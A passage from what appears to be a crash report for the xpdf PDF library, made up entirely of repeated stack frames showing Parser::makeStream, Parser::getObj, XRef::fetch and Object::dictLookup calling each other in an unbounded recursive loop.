xpdf/Object.h:253 #54 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #55 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #56 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #57 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #58 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #59 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #60 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #61 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #62 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #63 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #64 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #65 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #66 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #67 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #68 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #69 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #70 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #71 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #72 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #73 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #74 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #75 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #76 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #77 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #78 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #79 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #80 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #81 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #82 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #83 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #84 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #85 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #86 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #87 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #88 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #89 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #90 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #91 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #92 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #93 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #94 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #95 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #96 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #97 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #98 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #99 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #100 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #101 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #102 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #103 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #104 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #105 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #106 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #107 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #108 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #109 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #110 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #111 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #112 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #113 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #114 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #115 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #116 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #117 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #118 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #119 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #120 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #121 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #122 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #123 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #124 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #125 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #126 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #127 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #128 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #129 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #130 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #131 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #132 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #133 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #134 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #135 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #136 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #137 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #138 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #139 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #140 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #141 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #142 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #143 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #144 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #145 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #146 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #147 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #148 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #149 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #150 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #151 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #152 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #153 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #154 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #155 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #156 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #157 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #158 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #159 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #160 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #161 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #162 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #163 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #164 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #165 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #166 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #167 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #168 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #169 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #170 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #171 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #172 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #173 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #174 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #175 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #176 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #177 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #178 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #179 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #180 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #181 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #182 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #183 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #184 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #185 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #186 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #187 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #188 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #189 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #190 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #191 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #192 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #193 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #194 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #195 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #196 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #197 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #198 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #199 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #200 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #201 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #202 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #203 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #204 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #205 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #206 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #207 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #208 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #209 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #210 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #211 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #212 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #213 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #214 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #215 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #216 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #217 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #218 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #219 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #220 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #221 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #222 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #223 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #224 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #225 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #226 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #227 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #228 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #229 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #230 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #231 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #232 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #233 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #234 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #235 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #236 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #237 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #238 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #239 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #240 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #241 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #242 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #243 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #244 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #245 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #246 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #247 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #248 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #249 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #250 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #251 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #252 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #253 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #254 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #255 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #256 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #257 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #258 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #259 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #260 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #261 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #262 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #263 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #264 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #265 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #266 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #267 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #268 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #269 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #270 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #271 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #272 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #273 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #274 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #275 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #276 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #277 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #278 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #279 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #280 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #281 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #282 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #283 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #284 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #285 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #286 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #287 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #288 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #289 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #290 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #291 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #292 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #293 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #294 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #295 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #296 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #297 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #298 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #299 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #300 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #301 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #302 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #303 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #304 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #305 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #306 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #307 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #308 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #309 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #310 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #311 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #312 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #313 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #314 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #315 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #316 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #317 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #318 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #319 0x55a5e5e37bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #320 0x55a5e5e2eee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #321 0x55a5e5e35ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #322 0x55a5e5e35ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, 